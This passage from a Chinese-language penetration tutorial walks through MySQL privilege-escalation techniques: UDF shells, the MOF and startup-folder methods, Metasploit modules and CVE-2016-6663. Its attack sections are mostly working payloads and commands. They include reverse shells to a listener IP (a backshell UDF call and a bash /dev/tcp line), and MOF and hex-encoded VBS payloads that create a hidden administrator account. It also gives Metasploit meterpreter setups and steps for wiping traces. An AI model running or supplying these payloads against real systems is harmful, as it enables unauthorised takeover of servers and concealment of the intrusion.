\u589e\u52a0\u7528\u6237\u7684\u547d\u4ee4\u5e94\u8be5\u90fd\u662f\u53ef\u4ee5\u6210\u529f\u7684<\/p>\n<h3>\u5220\u9664\u81ea\u5b9a\u4e49\u51fd\u6570<\/h3>\n<pre><code>mysql &gt; drop function sys_eval;<\/code><\/pre>\n<h2>UDF shell<\/h2>\n<p>\u5047\u8bbe\u76ee\u6807 MySQL \u5728\u5185\u7f51\u60c5\u51b5\u4e0b\uff0c\u65e0\u6cd5\u76f4\u8fde MySQL \u6216\u8005 MySQL \u4e0d\u5141\u8bb8\u5916\u8fde\uff0c\u8fd9\u4e2a\u65f6\u5019\u4e00\u4e9b\u7f51\u9875\u811a\u672c\u5c31\u6bd4\u8f83\u65b9\u4fbf\u597d\u7528\u4e86\u3002<\/p>\n<h3>UDF.PHP<\/h3>\n<p><a href=\"https:\/\/github.com\/echohun\/tools\/blob\/master\/\u5927\u9a6c\/udf.php\" target=\"_blank\"  rel=\"nofollow\" >t00ls UDF.PHP<\/a> \u7b80\u5355\u65b9\u4fbf\uff0c\u4e00\u952e DUMP UDF 
\u548c\u51fd\u6570\uff0c\u64cd\u4f5c\u95e8\u69db\u964d\u4f4e\u4e86\u5f88\u591a\uff1a<\/p>\n<p><a href=\"https:\/\/image.3001.net\/images\/20201119\/16057508091895.png\" alt=\"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743\" title=\"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743\" target=\"_blank\"  rel=\"nofollow\" ><img decoding=\"async\" src=\"https:\/\/image.3001.net\/images\/20201119\/16057508091895.png\" alt=\"img\" \/><\/a> <\/p>\n<h3>Navicat MySQL<\/h3>\n<p>\u76ee\u6807 MySQL \u4e0d\u5141\u8bb8\u5916\u8fde\uff0c\u4f46\u662f\u53ef\u4ee5\u4e0a\u4f20 PHP \u811a\u672c:<\/p>\n<p><a href=\"https:\/\/image.3001.net\/images\/20201119\/16057523959536.png\" alt=\"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743\" title=\"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743\" target=\"_blank\"  rel=\"nofollow\" ><img decoding=\"async\" src=\"https:\/\/image.3001.net\/images\/20201119\/16057523959536.png\" alt=\"img\" \/><\/a> <\/p>\n<p>\u8fd9\u4e2a\u65f6\u5019\u53ef\u4ee5\u4f7f\u7528 Navicat \u81ea\u5e26\u7684 tunnel \u96a7\u9053\u811a\u672c\u4e0a\u4f20\u5230\u76ee\u6807\u7f51\u7ad9\u4e0a\uff1a<\/p>\n<p><a href=\"https:\/\/image.3001.net\/images\/20201119\/16057511437230.png\" alt=\"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743\" title=\"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743\" target=\"_blank\"  rel=\"nofollow\" ><img decoding=\"async\" src=\"https:\/\/image.3001.net\/images\/20201119\/16057511437230.png\" alt=\"img\" \/><\/a> <\/p>\n<p>\u56fd\u5149\u8fd9\u91cc\u987a\u4fbf\u6253\u5305\u4e86\u4e00\u4efd\u51fa\u6765\uff1a<a href=\"https:\/\/sqlsec.lanzoux.com\/ibpoGijd6bc\" target=\"_blank\"  rel=\"nofollow\" >\u84dd\u594f\u4e91\uff1aNavicat tunnel.zip<\/a> \u5b9e\u9645\u4e0a Navicat \u5f88\u4e45\u5f88\u4e45\u4ee5\u524d\u5c31\u81ea\u5e26\u8fd9\u4e9b\u811a\u672c\u4e86\uff0c\u8fd9\u4e2a\u811a\u672c\u6709\u70b9\u7c7b\u4f3c\u4e8e 
reGeorg\uff0c\u53ea\u662f\u5b98\u65b9\u7684\u811a\u672c\u7528\u8d77\u6765\u66f4\u8212\u670d\u65b9\u4fbf\u4e00\u70b9\uff0c\u811a\u672c\u7684\u754c\u9762\u5982\u4e0b\uff1a<\/p>\n<p><a href=\"https:\/\/image.3001.net\/images\/20201119\/16057520384495.png\" alt=\"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743\" title=\"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743\" target=\"_blank\"  rel=\"nofollow\" ><img decoding=\"async\" src=\"https:\/\/image.3001.net\/images\/20201119\/16057520384495.png\" alt=\"img\" \/><\/a> <\/p>\n<p>\u63a5\u7740\u8fde\u63a5\u7684\u65f6\u5019\u8bbe\u7f6e HTTP \u901a\u9053\uff1a<\/p>\n<p><a href=\"https:\/\/image.3001.net\/images\/20201119\/16057523604421.png\" alt=\"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743\" title=\"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743\" target=\"_blank\"  rel=\"nofollow\" ><img decoding=\"async\" src=\"https:\/\/image.3001.net\/images\/20201119\/16057523604421.png\" alt=\"img\" \/><\/a> <\/p>\n<p>\u8fd9\u4e2a\u65f6\u5019\u4e3b\u673a\u5730\u5740\u586b\u5199 localhost \u5373\u53ef\uff1a<\/p>\n<p><a href=\"https:\/\/image.3001.net\/images\/20201119\/16057524473020.png\" alt=\"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743\" title=\"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743\" target=\"_blank\"  rel=\"nofollow\" ><img decoding=\"async\" src=\"https:\/\/image.3001.net\/images\/20201119\/16057524473020.png\" alt=\"img\" \/><\/a> <\/p>\n<p>\u8fde\u63a5\u6210\u529f\u540e\u81ea\u7136\u5c31\u53ef\u4ee5\u6109\u5feb\u5730\u8fdb\u884c\u624b\u5de5 UDF \u63d0\u6743\u5566\uff1a<\/p>\n<p><a href=\"https:\/\/image.3001.net\/images\/20201119\/16057526319645.png\" alt=\"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743\" title=\"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743\" target=\"_blank\"  rel=\"nofollow\" ><img decoding=\"async\" src=\"https:\/\/image.3001.net\/images\/20201119\/16057526319645.png\" alt=\"img\" \/><\/a> <\/p>\n<h1>\u53cd\u5f39\u7aef\u53e3\u63d0\u6743<\/h1>\n<p>\u5b9e\u9645\u4e0a\u8fd9\u662f UDF 
\u63d0\u6743\u7684\u53e6\u4e00\u79cd\u7528\u6cd5\uff0c\u53ea\u662f\u8fd9\u91cc\u7684\u52a8\u6001\u94fe\u63a5\u5e93\u88ab\u5b9a\u5236\u8fc7\u7684\uff0c\u529f\u80fd\u66f4\u591a\u66f4\u5b9e\u7528\u4e00\u4e9b\uff1a<\/p>\n<pre><code>cmdshell        # \u6267\u884ccmd\ndownloader      # \u4e0b\u8f7d\u8005,\u5230\u7f51\u4e0a\u4e0b\u8f7d\u6307\u5b9a\u6587\u4ef6\u5e76\u4fdd\u5b58\u5230\u6307\u5b9a\u76ee\u5f55\nopen3389        # \u901a\u7528\u5f003389\u7ec8\u7aef\u670d\u52a1,\u53ef\u6307\u5b9a\u7aef\u53e3(\u4e0d\u6539\u7aef\u53e3\u65e0\u9700\u91cd\u542f)\nbackshell       # \u53cd\u5f39Shell\nProcessView     # \u679a\u4e3e\u7cfb\u7edf\u8fdb\u7a0b\nKillProcess     # \u7ec8\u6b62\u6307\u5b9a\u8fdb\u7a0b\nregread         # \u8bfb\u6ce8\u518c\u8868\nregwrite        # \u5199\u6ce8\u518c\u8868\nshut            # \u5173\u673a,\u6ce8\u9500,\u91cd\u542f\nabout           # \u8bf4\u660e\u4e0e\u5e2e\u52a9\u51fd\u6570<\/code><\/pre>\n<p>\u8fd9\u4e2a\u52a8\u6001\u94fe\u63a5\u5e93\u6709\u70b9\u5386\u53f2\u4e86\uff0c\u4e0d\u8fc7\u8fd8\u662f\u88ab\u56fd\u5149\u6211\u627e\u5230\u4e86<a href=\"https:\/\/sqlsec.lanzoux.com\/iEQA0ijfu6d\" target=\"_blank\"  rel=\"nofollow\" >\u84dd\u594f\u4e91\uff1alangouster_udf.zip<\/a>\uff1a<\/p>\n<p><a href=\"https:\/\/image.3001.net\/images\/20201119\/16057546316568.png\" alt=\"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743\" title=\"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743\" target=\"_blank\"  rel=\"nofollow\" ><img decoding=\"async\" src=\"https:\/\/image.3001.net\/images\/20201119\/16057546316568.png\" alt=\"img\" \/><\/a> <\/p>\n<p>\u4e0b\u9762\u5c1d\u8bd5\u6765\u4f7f\u7528\u8fd9\u4e2a dll \u6765\u53cd\u5f39 shell \u8bd5\u8bd5\u770b\u5427\uff0c\u9996\u5148\u5728 10.20.24.244 \u4e0a\u5f00\u542f NC \u76d1\u542c\uff1a<\/p>\n<pre><code>\u279c  ~ ncat -lvp 2333\nNcat: Version 7.80 ( https:\/\/nmap.org\/ncat )\nNcat: Listening on :::2333\nNcat: Listening on 0.0.0.0:2333<\/code><\/pre>\n<p>\u7136\u540e\u76ee\u6807\u673a\u5668\u4e0a\u5bfc\u5165 dll 
\u52a8\u6001\u94fe\u63a5\u5e93\uff08\u8fd9\u91cc\u5077\u61d2\u5c31\u5ffd\u7565\u4e86\uff09\uff0c\u7136\u540e\u521b\u5efa\u81ea\u5b9a\u4e49\u51fd\u6570\uff1a<\/p>\n<pre><code>mysql &gt; CREATE FUNCTION backshell RETURNS STRING SONAME &#039;udf.dll&#039;;<\/code><\/pre>\n<p>\u76f4\u63a5\u53cd\u5f39 shell \uff1a<\/p>\n<pre><code>mysql &gt; select backshell(&quot;10.20.24.244&quot;, 2333);<\/code><\/pre>\n<p>\u6210\u529f\u4e0a\u7ebf\uff1a<\/p>\n<p><a href=\"https:\/\/image.3001.net\/images\/20201119\/16057552542660.png\" alt=\"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743\" title=\"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743\" target=\"_blank\"  rel=\"nofollow\" ><img decoding=\"async\" src=\"https:\/\/image.3001.net\/images\/20201119\/16057552542660.png\" alt=\"img\" \/><\/a>  <\/p>\n<h1>MOF \u63d0\u6743<\/h1>\n<p>MOF \u63d0\u6743\u662f\u4e00\u4e2a\u6709\u5386\u53f2\u7684\u6f0f\u6d1e\uff0c\u57fa\u672c\u4e0a\u5728 Windows Server 2003 \u7684\u73af\u5883\u4e0b\u624d\u53ef\u4ee5\u6210\u529f\u3002\u63d0\u6743\u7684\u539f\u7406\u662f  C:\/Windows\/system32\/wbem\/mof\/ \u76ee\u5f55\u4e0b\u7684 mof \u6587\u4ef6\u6bcf \u9694\u4e00\u6bb5\u65f6\u95f4\uff08\u51e0\u79d2\u949f\u5de6\u53f3\uff09\u90fd\u4f1a\u88ab\u7cfb\u7edf\u6267\u884c\uff0c\u56e0\u4e3a\u8fd9\u4e2a MOF  \u91cc\u9762\u6709\u4e00\u90e8\u5206\u662f VBS \u811a\u672c\uff0c\u6240\u4ee5\u53ef\u4ee5\u5229\u7528\u8fd9\u4e2a VBS \u811a\u672c\u6765\u8c03\u7528 CMD \u6765\u6267\u884c\u7cfb\u7edf\u547d\u4ee4\uff0c\u5982\u679c MySQL \u6709\u6743\u9650\u64cd\u4f5c mof  \u76ee\u5f55\u7684\u8bdd\uff0c\u5c31\u53ef\u4ee5\u6765\u6267\u884c\u4efb\u610f\u547d\u4ee4\u4e86\u3002<\/p>\n<h2>\u624b\u5de5\u590d\u73b0<\/h2>\n<h3>\u4e0a\u4f20 mof \u6587\u4ef6\u6267\u884c\u547d\u4ee4<\/h3>\n<p>mof \u811a\u672c\u7684\u5185\u5bb9\u5982\u4e0b\uff1a<\/p>\n<pre><code>#pragma namespace(&quot;\\\\\\\\.\\\\root\\\\subscription&quot;) \n\ninstance of __EventFilter as $EventFilter \n{ \n    EventNamespace = &quot;Root\\\\Cimv2&quot;; \n    Name  = 
&quot;filtP2&quot;; \n    Query = &quot;Select * From __InstanceModificationEvent &quot; \n            &quot;Where TargetInstance Isa \\&quot;Win32_LocalTime\\&quot; &quot; \n            &quot;And TargetInstance.Second = 5&quot;; \n    QueryLanguage = &quot;WQL&quot;; \n}; \n\ninstance of ActiveScriptEventConsumer as $Consumer \n{ \n    Name = &quot;consPCSV2&quot;; \n    ScriptingEngine = &quot;JScript&quot;; \n    ScriptText = \n&quot;var WSH = new ActiveXObject(\\&quot;WScript.Shell\\&quot;)\\nWSH.run(\\&quot;net.exe user hacker P@ssw0rd \/add\\&quot;)\\nWSH.run(\\&quot;net.exe localgroup administrators hacker \/add\\&quot;)&quot;; \n}; \n\ninstance of __FilterToConsumerBinding \n{ \n    Consumer   = $Consumer; \n    Filter = $EventFilter; \n};<\/code><\/pre>\n<p>\u6838\u5fc3 payload \u4e3a\uff1a<\/p>\n<pre><code>var WSH = new ActiveXObject(\\&quot;WScript.Shell\\&quot;)\\nWSH.run(\\&quot;net.exe user hacker P@ssw0rd \/add\\&quot;)\\nWSH.run(\\&quot;net.exe localgroup administrators hacker \/add\\&quot;)<\/code><\/pre>\n<p>\u5229\u7528 MySQL \u5199\u6587\u4ef6\u7684\u7279\u6027\u5c06\u8fd9\u4e2a MOF \u6587\u4ef6\u5bfc\u5165\u5230 C:\/Windows\/system32\/wbem\/mof\/ \u76ee\u5f55\u4e0b\uff0c\u4f9d\u7136\u91c7\u7528\u4e0a\u8ff0\u7f16\u7801\u7684\u65b9\u5f0f\uff1a<\/p>\n<pre><code>mysql &gt; select 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into dumpfile &quot;C:\/windows\/system32\/wbem\/mof\/test.mof&quot;;<\/code><\/pre>\n<p>\u6267\u884c\u6210\u529f\u7684\u65f6\u5019\uff0ctest.mof \u4f1a\u51fa\u73b0\u5728\uff1ac:\/windows\/system32\/wbem\/good\/ \u76ee\u5f55\u4e0b\uff0c\u5426\u5219\u51fa\u73b0\u5728 c:\/windows\/system32\/wbem\/bad \u76ee\u5f55\u4e0b\uff1a<\/p>\n<p><a href=\"https:\/\/image.3001.net\/images\/20201118\/16056293813642.png\" alt=\"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743\" title=\"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743\" target=\"_blank\"  rel=\"nofollow\" ><img decoding=\"async\" 
src=\"https:\/\/image.3001.net\/images\/20201118\/16056293813642.png\" alt=\"img\" \/><\/a> <\/p>\n<h3>\u75d5\u8ff9\u6e05\u7406<\/h3>\n<p>\u56e0\u4e3a\u6bcf\u9694\u51e0\u5206\u949f\u65f6\u95f4\u53c8\u4f1a\u91cd\u65b0\u6267\u884c\u6dfb\u52a0\u7528\u6237\u7684\u547d\u4ee4\uff0c\u6240\u4ee5\u60f3\u8981\u6e05\u7406\u75d5\u8ff9\u5f97\u5148\u6682\u65f6\u5173\u95ed winmgmt \u670d\u52a1\u518d\u5220\u9664\u76f8\u5173 mof \u6587\u4ef6\uff0c\u8fd9\u4e2a\u65f6\u5019\u518d\u5220\u9664\u7528\u6237\u624d\u4f1a\u6709\u6548\u679c\uff1a<\/p>\n<pre><code># \u505c\u6b62 winmgmt \u670d\u52a1\nnet stop winmgmt\n\n# \u5220\u9664 Repository \u6587\u4ef6\u5939\nrmdir \/s \/q C:\\Windows\\system32\\wbem\\Repository\\\n\n# \u624b\u52a8\u5220\u9664 mof \u6587\u4ef6\ndel C:\\Windows\\system32\\wbem\\mof\\good\\test.mof \/F \/S\n\n# \u5220\u9664\u521b\u5efa\u7684\u7528\u6237\nnet user hacker \/delete\n\n# \u91cd\u65b0\u542f\u52a8\u670d\u52a1\nnet start winmgmt<\/code><\/pre>\n<h2>MSF MOF \u63d0\u6743<\/h2>\n<p>MSF \u91cc\u9762\u4e5f\u81ea\u5e26\u4e86 MOF \u63d0\u6743\u6a21\u5757\uff0c\u4f7f\u7528\u8d77\u6765\u4e5f\u6bd4\u8f83\u65b9\u4fbf\u800c\u4e14\u4e5f\u505a\u5230\u4e86\u81ea\u52a8\u6e05\u7406\u75d5\u8ff9\u7684\u6548\u679c\uff0c\u5b9e\u9645\u64cd\u4f5c\u8d77\u6765\u6548\u7387\u4e5f\u8fd8\u4e0d\u9519\uff1a<\/p>\n<pre><code>msf6 &gt; use exploit\/windows\/mysql\/mysql_mof\n# \u8bbe\u7f6e\u597d\u81ea\u5df1\u7684 payload\nmsf6 &gt; set payload windows\/meterpreter\/reverse_tcp\n\n# \u8bbe\u7f6e\u76ee\u6807 MySQL \u7684\u57fa\u7840\u4fe1\u606f\nmsf6 &gt; set rhosts 10.211.55.21\nmsf6 &gt; set username root\nmsf6 &gt; set password root\nmsf6 &gt; run<\/code><\/pre>\n<p>\u5b9e\u9645\u8fd0\u884c\u6548\u679c\u5982\u4e0b\uff1a<\/p>\n<p><a href=\"https:\/\/image.3001.net\/images\/20201119\/16057532596683.png\" alt=\"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743\" title=\"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743\" target=\"_blank\"  rel=\"nofollow\" ><img decoding=\"async\" 
src=\"https:\/\/image.3001.net\/images\/20201119\/16057532596683.png\" alt=\"img\" \/><\/a> <\/p>\n<h1>\u542f\u52a8\u9879\u63d0\u6743<\/h1>\n<p>\u8fd9\u79cd\u63d0\u6743\u4e5f\u5e38\u89c1\u4e8e Windows \u73af\u5883\u4e0b\uff0c\u5f53 Windows \u7684\u542f\u52a8\u9879\u53ef\u4ee5\u88ab MySQL \u5199\u5165\u7684\u65f6\u5019\u53ef\u4ee5\u4f7f\u7528 MySQL \u5c06\u81ea\u5b9a\u4e49\u811a\u672c\u5bfc\u5165\u5230\u542f\u52a8\u9879\u4e2d\uff0c\u8fd9\u4e2a\u811a\u672c\u4f1a\u5728\u7528\u6237\u767b\u5f55\u3001\u5f00\u673a\u3001\u5173\u673a\u7684\u65f6\u5019\u81ea\u52a8\u8fd0\u884c\u3002<\/p>\n<h2>\u624b\u5de5\u590d\u73b0<\/h2>\n<h3>\u542f\u52a8\u9879\u8def\u5f84<\/h3>\n<p><strong>Windows Server 2003<\/strong> \u7684\u542f\u52a8\u9879\u8def\u5f84\uff1a<\/p>\n<pre><code># \u4e2d\u6587\u7cfb\u7edf\nC:\\Documents and Settings\\Administrator\\\u300c\u5f00\u59cb\u300d\u83dc\u5355\\\u7a0b\u5e8f\\\u542f\u52a8\nC:\\Documents and Settings\\All Users\\\u300c\u5f00\u59cb\u300d\u83dc\u5355\\\u7a0b\u5e8f\\\u542f\u52a8\n\n# \u82f1\u6587\u7cfb\u7edf\nC:\\Documents and Settings\\Administrator\\Start Menu\\Programs\\Startup\nC:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\n\n# \u5f00\u5173\u673a\u9879 \u9700\u8981\u81ea\u5df1\u5efa\u7acb\u5bf9\u5e94\u6587\u4ef6\u5939\nC:\\WINDOWS\\system32\\GroupPolicy\\Machine\\Scripts\\Startup\nC:\\WINDOWS\\system32\\GroupPolicy\\Machine\\Scripts\\Shutdown<\/code><\/pre>\n<p><strong>Windows Server 2008<\/strong> \u7684\u542f\u52a8\u9879\u8def\u5f84\uff1a<\/p>\n<pre><code>C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\nC:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup<\/code><\/pre>\n<p>\u65e2\u7136\u77e5\u9053\u8def\u5f84\u7684\u8bdd\u5c31\u5f80\u542f\u52a8\u9879\u8def\u5f84\u91cc\u9762\u5199\u5165\u811a\u672c\u5427\uff0c\u811a\u672c\u652f\u6301 vbs \u548c exe \u7c7b\u578b\uff0c\u53ef\u4ee5\u5229\u7528 vbs \u6267\u884c\u4e00\u4e9b CMD 
\u547d\u4ee4\uff0c\u4e5f\u53ef\u4ee5\u4f7f\u7528 exe \u4e0a\u7ebf MSF \u6216\u8005 CS\uff0c\u8fd9\u65b9\u9762\u8fd8\u662f\u6bd4\u8f83\u7075\u6d3b\u7684\u3002\u4e0b\u9762\u662f\u4e00\u4e2a\u6267\u884c\u57fa\u7840\u547d\u4ee4\u7684 VB \u811a\u672c\uff1a<\/p>\n<pre><code>Set WshShell=WScript.CreateObject(&quot;WScript.Shell&quot;)\nWshShell.Run &quot;net user hacker P@ssw0rd \/add&quot;, 0\nWshShell.Run &quot;net localgroup administrators hacker \/add&quot;, 0<\/code><\/pre>\n<h3>MySQL \u5199\u5165\u542f\u52a8\u9879<\/h3>\n<p>\u5c06\u4e0a\u8ff0 vbs \u6216\u8005 CS \u7684\u9a6c\u8f6c\u5341\u516d\u8fdb\u5236\u76f4\u63a5\u5199\u5165\u5230\u7cfb\u7edf\u542f\u52a8\u9879\u4e2d\uff1a<\/p>\n<pre><code>mysql &gt; select 0x536574205773685368656C6C3D575363726970742E4372656174654F626A6563742822575363726970742E5368656C6C22290A5773685368656C6C2E52756E20226E65742075736572206861636B6572205040737377307264202F616464222C20300A5773685368656C6C2E52756E20226E6574206C6F63616C67726F75702061646D696E6973747261746F7273206861636B6572202F616464222C20300A into dumpfile &quot;C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\test.vbs&quot;;<\/code><\/pre>\n<p>\u5199\u5165\u6210\u529f\u7684\u65f6\u5019\u5c31\u7b49\u5f85\u7cfb\u7edf\u7528\u6237\u91cd\u65b0\u767b\u5f55\uff0c\u767b\u5f55\u6210\u529f\u7684\u8bdd\uff0c\u6211\u4eec\u7684\u81ea\u5b9a\u4e49\u811a\u672c\u4e5f\u5c31\u4f1a\u88ab\u6267\u884c\u3002<\/p>\n<h2>MSF \u542f\u52a8\u9879\u63d0\u6743<\/h2>\n<p>\u6ca1\u9519\uff0cMSF \u4e5f\u5c01\u88c5\u597d\u4e86\u5bf9\u5e94\u7684\u6a21\u5757\uff0c\u76ee\u6807\u7cfb\u7edf\u4e3a Windows \u7684\u60c5\u51b5\u4e0b\u53ef\u4ee5\u76f4\u63a5\u4f7f\u7528\u8be5\u6a21\u5757\u6765\u4e0a\u7ebf MSF\uff0c\u4f7f\u7528\u8d77\u6765\u4e5f\u5f88\u7b80\u5355\uff1a<\/p>\n<pre><code>msf6 &gt; use exploit\/windows\/mysql\/mysql_start_up\n\n# \u914d\u7f6e MySQL \u8fde\u63a5\u4fe1\u606f\nmsf6 &gt; set rhosts 10.211.55.6\nmsf6 &gt; set username root\nmsf6 &gt; set password root\nmsf6 &gt; 
run<\/code><\/pre>\n<p><a href=\"https:\/\/image.3001.net\/images\/20201119\/16057598832602.png\" alt=\"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743\" title=\"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743\" target=\"_blank\"  rel=\"nofollow\" ><img decoding=\"async\" src=\"https:\/\/image.3001.net\/images\/20201119\/16057598832602.png\" alt=\"img\" \/><\/a> <\/p>\n<blockquote>\n<p>STARTUP_FOLDER \u542f\u52a8\u9879\u6587\u4ef6\u5939\u5f97\u81ea\u5df1\u6839\u636e\u5b9e\u9645\u7684\u76ee\u6807\u7cfb\u7edf\u6765\u8fdb\u884c\u8c03\u6574<\/p>\n<\/blockquote>\n<p>MSF \u4f1a\u5199\u5165 exe \u6728\u9a6c\u5230\u542f\u52a8\u9879\u4e2d\uff0c\u6267\u884c\u5b8c\u6210\u540e\u5f00\u542f\u76d1\u542c\u4f1a\u8bdd\uff1a<\/p>\n<pre><code>msf6 &gt; handler -H 10.20.24.244 -P 4444 -p windows\/meterpreter\/reverse_tcp<\/code><\/pre>\n<p>\u5f53\u76ee\u6807\u7cfb\u7edf\u91cd\u65b0\u767b\u5f55\u7684\u65f6\u5019\uff0cMSF \u8fd9\u91cc\u53ef\u4ee5\u770b\u5230\u5df2\u7ecf\u6210\u529f\u4e0a\u7ebf\u4e86\uff1a<\/p>\n<p><a href=\"https:\/\/image.3001.net\/images\/20201119\/16057604132227.png\" alt=\"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743\" title=\"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743\" target=\"_blank\"  rel=\"nofollow\" ><img decoding=\"async\" src=\"https:\/\/image.3001.net\/images\/20201119\/16057604132227.png\" alt=\"img\" \/><\/a> <\/p>\n<h1>CVE-2016-6663<\/h1>\n<h2>\u73af\u5883\u51c6\u5907<\/h2>\n<p>\u56fd\u5149\u6539\u4e86\u57fa\u4e8e\u7f51\u4e0a\u7684\u6559\u7a0b\u5c01\u88c5\u6253\u5305\u4e86\u4e00\u4e2a Docker \u955c\u50cf\u4e0a\u4f20\u5230\u4e86 Docker Hub\uff0c\u73b0\u5728\u5927\u5bb6\u90e8\u7f72\u5c31\u4f1a\u65b9\u4fbf\u8bb8\u591a\uff1a<\/p>\n<pre><code># \u62c9\u53d6\u955c\u50cf\ndocker pull sqlsec\/cve-2016-6663\n\n# \u90e8\u7f72\u955c\u50cf\ndocker run -d -p 3306:3306 -p 8080:80 --name CVE-2016-6663 sqlsec\/cve-2016-6663<\/code><\/pre>\n<p>\u6dfb\u52a0\u4e00\u4e2a test \u6570\u636e\u5e93\u7528\u6237\uff0c\u5bc6\u7801\u4e3a 123456 
\u5e76\u8d4b\u4e88\u4e00\u4e9b\u57fa\u7840\u6743\u9650\uff1a<\/p>\n<pre><code># \u521b\u5efa test \u6570\u636e\u5e93\nmysql &gt; create database test;\n\n# \u8bbe\u7f6e test \u5bc6\u7801\u4e3a 123456\nmysql &gt; CREATE USER &#039;test&#039;@&#039;%&#039; IDENTIFIED BY &#039;123456&#039;; \n\n# \u8d4b\u4e88\u57fa\u7840\u6743\u9650\nmysql &gt; grant create,drop,insert,select on test.* to &#039;test&#039;@&#039;%&#039;;\n\n# \u5237\u65b0\u6743\u9650\nmysql &gt; flush privileges;<\/code><\/pre>\n<p>\u4e5f\u53ef\u4ee5\u5c06\u4e0a\u8ff0\u64cd\u4f5c\u6574\u5408\u6210\u4e00\u6761\u547d\u4ee4\uff1a<\/p>\n<pre><code>mysql -uroot -e &quot;create database test;CREATE USER &#039;test&#039;@&#039;%&#039; IDENTIFIED BY &#039;123456&#039;; grant create,drop,insert,select on test.* to &#039;test&#039;@&#039;%&#039;;flush privileges;&quot;<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u590d\u73b0<\/h2>\n<p>\u7ade\u4e89\u6761\u4ef6\u63d0\u6743\u6f0f\u6d1e\uff0c\u4e00\u4e2a\u62e5\u6709 CREATE\/INSERT\/SELECT \u4f4e\u6743\u9650\u7684\u8d26\u6237\u63d0\u6743\u6210\u529f\u540e\u53ef\u4ee5\u7cfb\u7edf\u7528\u6237\u8eab\u4efd\u6267\u884c\u4efb\u610f\u4ee3\u7801\uff0c\u63d0\u6743\u7684\u7528\u6237\u4e3a mysql \u7528\u6237\uff0c\u6982\u62ec\u4e00\u4e0b\u5c31\u662f\u5c06\u4f4e\u6743\u9650\u7684 www-data \u6743\u9650\u63d0\u5347\u4e3a mysql \u6743\u9650\u3002<\/p>\n<p><strong>\u5229\u7528\u6210\u529f\u6761\u4ef6<\/strong><\/p>\n<ol>\n<li>Getshell \u62ff\u5230 www-data \u6743\u9650<\/li>\n<li>\u62ff\u5230 CREATE\/INSERT\/SELECT \u4f4e\u6743\u9650\u7684 MySQL \u8d26\u6237<\/li>\n<li>\u5173\u952e\u63d0\u6743\u6b65\u9aa4\u9700\u8981\u5728\u4ea4\u4e92\u73af\u5883\u4e0b\uff0c\u6240\u4ee5\u9700\u8981\u53cd\u5f39 shell<\/li>\n<li>MySQL \u7248\u672c\u9700\u8981 &lt;=5.5.51 \u6216 5.6.x &lt;=5.6.32 \u6216 5.7.x &lt;=5.7.14 \u6216 8.x &lt; 8.0.1<\/li>\n<li>MariaDB \u7248\u672c\u9700\u8981 &lt;= 5.5.51 \u6216 10.0.x &lt;= 10.0.27 \u6216 10.1.x &lt;= 10.1.17<\/li>\n<\/ol>\n<p>CVE-2016-6663 EXP mysql-privesc-race.c 
\u53c2\u8003\u94fe\u63a5\uff1a<a href=\"https:\/\/legalhackers.com\/advisories\/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html\" target=\"_blank\"  rel=\"nofollow\" >MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit<\/a><\/p>\n<p>\u901a\u8fc7\u8681\u5251\u4e0a\u4f20 EXP\uff0c\u7136\u540e Bash \u53cd\u5f39 shell\uff1a<\/p>\n<p>\u9996\u5148 10.20.24.244 \u7aef\u53e3\u5f00\u542f\u76d1\u542c\uff1a<\/p>\n<pre><code>\u279c  ~ ncat -lvp 2333\nNcat: Version 7.80 ( https:\/\/nmap.org\/ncat )\nNcat: Listening on :::2333\nNcat: Listening on 0.0.0.0:2333<\/code><\/pre>\n<p>\u8681\u5251\u7ec8\u7aef\u4e0b\u53cd\u5f39 Bash\uff1a<\/p>\n<pre><code>bash -i &gt;&amp; \/dev\/tcp\/10.20.24.244\/2333 0&gt;&amp;1<\/code><\/pre>\n<p><a href=\"https:\/\/image.3001.net\/images\/20201119\/16057848805997.png\" alt=\"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743\" title=\"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743\" target=\"_blank\"  rel=\"nofollow\" ><img decoding=\"async\" src=\"https:\/\/image.3001.net\/images\/20201119\/16057848805997.png\" alt=\"img\" \/><\/a> <\/p>\n<p>\u5728\u53cd\u5f39 shell 